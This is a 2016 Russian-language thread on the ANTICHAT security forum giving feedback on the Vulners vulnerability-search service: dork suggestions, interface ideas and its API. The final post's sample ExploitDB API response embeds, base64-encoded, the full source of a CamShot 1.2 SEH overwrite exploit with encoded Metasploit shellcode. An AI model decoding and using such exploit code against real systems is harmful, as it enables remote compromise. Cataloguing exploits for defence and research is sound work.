ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.01.2016, 12:56
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме: 44902
Репутация:
0
|
|
Возможно источники стоит отдельно как то выводить при поиске с возможностью выбора, типа какого нибудь выпадающего списка.
Под кнопкой Next светится rd_arrow_right)
|
|
|

12.01.2016, 12:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 6895
Репутация:
12
|
|
Сообщение от ZodiaX
ZodiaX said:
↑
Возможно источники стоит отдельно как то выводить при поиске с возможностью выбора, типа какого нибудь выпадающего списка.
Под кнопкой Next светится rd_arrow_right)
Мы хотим сделать авто-подскази в духе Гугла. Что бы он подсказывал возможные dork-и и их значения. Ну и help-пейдж.
А как было бы удобно?
|
|
|
|

12.01.2016, 13:06
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от isox
isox said:
↑
Мы хотим сделать авто-подскази в духе Гугла. Что бы он подсказывал возможные dork-и и их значения. Ну и help-пейдж.
А как было бы удобно?
с гуем и кнопочками
|
|
|

12.01.2016, 13:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 6895
Репутация:
12
|
|
Сообщение от yarbabin
yarbabin said:
↑
с гуем и кнопочками
Перегружать интерфейс страшно...Пояснишь как было бы вкусно для тебя?) ( https://moqups.com/ - крутая штука)
|
|
|
|

12.01.2016, 13:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
и ещё с кнопкой hack которая всё сама делает за тебя. находит уязвимость заливает шел и даёт сылку на шел.
|
|
|
|

12.01.2016, 13:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
Сообщение от BabaDook
BabaDook said:
↑
и ещё с кнопкой hack которая всё сама делает за тебя. находит уязвимость заливает шел и даёт сылку на шел.
шелл не заливает,но узявимости находит ) https://www.punkspider.org/
|
|
|
|

12.01.2016, 13:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
|
|
|
|

12.01.2016, 13:30
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме: 44902
Репутация:
0
|
|
|
|
|

12.01.2016, 13:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 6895
Репутация:
12
|
|
|
|
|
|

12.01.2016, 14:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 137330
Репутация:
7
|
|
Сообщение от isox
isox said:
↑
Для поиска:
GET /api/v0/search/type:cve HTTP/1.1 ---> Строку поиска пихаем после /search/
Host: vulners.com
Отдает json:
{"results":[список dict-ов элементо]}
Для листинга:
GET /api/v0/hackerone/ HTTP/1.1 ---> После /v0/ пихаем тип элемента
Host: vulners.com
Отдает json:
{"count":123, "results":["123","123"]}
В results список id, которые можно потом вынуть вот так:
GET /api/v0/hackerone/52181 HTTP/1.1
Host: vulners.com
Отдаст json:
{"results":{элемент из базы}}
Пример для ExploitDB:
GET /api/v0/exploitdb/ HTTP/1.1
Host: vulners.com
{"count": 35429, "results": ["EDB-ID:11226", "EDB-ID:11264", "EDB-ID:11257", "EDB-ID:11233", "EDB-ID:11240", "EDB-ID:11271", "EDB-ID:11288", "EDB-ID:11238", "EDB-ID:11245", "EDB-ID:11276", "EDB-ID:11408", "EDB-ID:11357", "EDB-ID:11364", "EDB-ID:11369", "EDB-ID:11376", "EDB-ID:11403", "EDB-ID:11383", "EDB-ID:11395", "EDB-ID:11410", "EDB-ID:11352", "EDB-ID:11281", "EDB-ID:11293", "EDB-ID:11298", "EDB-ID:11301", "EDB-ID:11286", "EDB-ID:11325", "EDB-ID:11318", "EDB-ID:11306", "EDB-ID:11320", "EDB-ID:11262", "EDB-ID:11228".......]}
GET /api/v0/exploitdb/EDB-ID:11272 HTTP/1.1
Host: vulners.com
{"results": {"description": "CamShot v1.2 SEH Overwrite Exploit. Remote exploit for windows platform", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceB64": "b'IyBDYW1TaG90IFNFSCBvdmVyd3JpdGUgYnkgdGVjbmlrDQo NCmltcG9ydCBzb2NrZXQsIHN5cw0KDQppZiBsZW4oc3lzLmFyZ 3YpIT0yOg0KICAgIHByaW50ICJVc2FnZTogY2Ftc2hvdC5weSA 8dGFyZ2V0PiINCiAgICBleGl0KCkNCg0KcyA9IHNvY2tldC5zb 2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkV BTSkNCnMuY29ubmVjdCgoc3lzLmFyZ3ZbMV0sODApKQ0KDQpwc mludCAiU2VuZGluZyBFeHBsb2l0IHRvOiIgKyBzeXMuYXJndls xXQ0KDQojIEdFVCByZXF1ZXN0ICsgb3ZlcmZsb3cgc3RyaW5nD QpyZXF1ZXN0ICA9IkdFVCAvIg0KcmVxdWVzdCArPSJBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUEiDQojIHNob3J0IGp1bXAgb 3ZlciBTRSBIYW5kbGVyIEFkZHIgb3ZlcndyaXRlDQpyZXF1ZXN 0ICs9Ilx4OTBceDkwXHhFQlx4MDciDQojIG92ZXJ3cml0ZSBTR UggdG8gcG9pbnQgdG8gbWZjNDAuZGxsIChubyBTYWZlU2VoKSB KTVAgW0VCUC00XQ0KcmVxdWVzdCArPSJceDlBXHhGN1x4QTlce DYxIg0KIyBOT1AncyBJIGhhdmVuJ3QgY2xlYW5lZCB1cDsgU1V CIEVCUCwtNTA4OyBYQ0hHIEVCUCxFRFg7ICh0byBzZXR1cCBCY XNlIEFkZHIgZm9yIEFMUEhBMyBlbmNvZGVkIHNoZWxsY29kZSk NCnJlcXVlc3QgKz0iXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwX Hg5MFx4OTBceDkwXHg5MFx4ODFceEVEXHhGOFx4RkFceEZGXHh GRlx4OTBceDkwXHg4N1x4RUEiIA0KDQojIEFMUEhBMyBlbmNvZ GVkIChsb3dlcmNhc2UgYXNjaWkgd2l0aCBFRFggYmFzZSkgTWV 0YXNwbG9pdCBzaGVsbGNvZGUgKEV4ZWMgY2FsYy5leGUpDQpyZ XF1ZXN0ICs9ImozMTRkMzRkanEzNGRqazM0ZDE0MjFyMTFyN2o zMTRkMzRkajIzNGRrbXI1MDJkcjVvMGQyNXVzejg1NTYxazIwM jEzbzgzMDYwNDk5OTEzbzI2NTZlMzI3ZTc5bGQxMzAzbDJrODh nbmQweDN4bXhsazg1NmM3Y240MGswNDlrbGU2NTcwb2IweGtrO WQzOTAxb2s1ZDNkbng1YzBlbXhuODMxbzU3Y294Nng1ZDRiNWR uZzZma2czMjI1MzJsOTExbDRvZjRrOGszeDg5bGRtYzE1MXhqO TUzbmZreDZmMzMzYzE5bDBtZTY0NWcxMjU0b2ttZWw1MDUwMjN jbzMwZW84N2ZtMTc4amczMG04bjJsMTRnNGM4ZWwzNDI5OTdiN Xg5eG4wNDk4NDV4b2s0NDE1NTAzZzNnbjQxZm1kbGI2Zm5rNjI 5Y2prazJqNTk4NzhuMjNlNDEzODgxbmI5YzFmbWUyNDFnbDFue DBlNzExMzY5bmU5MGoxM2UwYjEyMGRrZTU4MWQ0MjEyMWNvMDd jODNrMmxlbGU0eDVrM2Q3Z284NGQ5YzAxNXgwMzhkMzJsNW8zN mcwODhjMGI5MzAyMjlqOW9lN3gzMzJiamc4ZjM4MjVuazQyMjA 4MTg4OGNseDlnMGszY2w1ajhrZjcxMzkxOTciDQoNCg0KcmVxd WVzdCArPSIgSFRUUC8xLjFcclxuIg0KcmVxdWVzdCArPSJIT1N UOiAxMjcuMC4wLjFcclxuXHJcbiINCg0Kcy5zZW5kKHJlcXVlc 3QpDQoNCnByaW50ICJEb25lLiINCg0Kcy5jbG9zZSgpDQo='", "cvelist": [], "type": "exploitdb", "lastseen": "2015-08-08T02:59:56", "author": "tecnik", "title": "CamShot 1.2 - SEH Overwrite Exploit", "href": "
https://www.exploit-db.com/exploits/11272/
", "id": "EDB-ID:11272", "published": "2010-01-27"}}
Збс)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|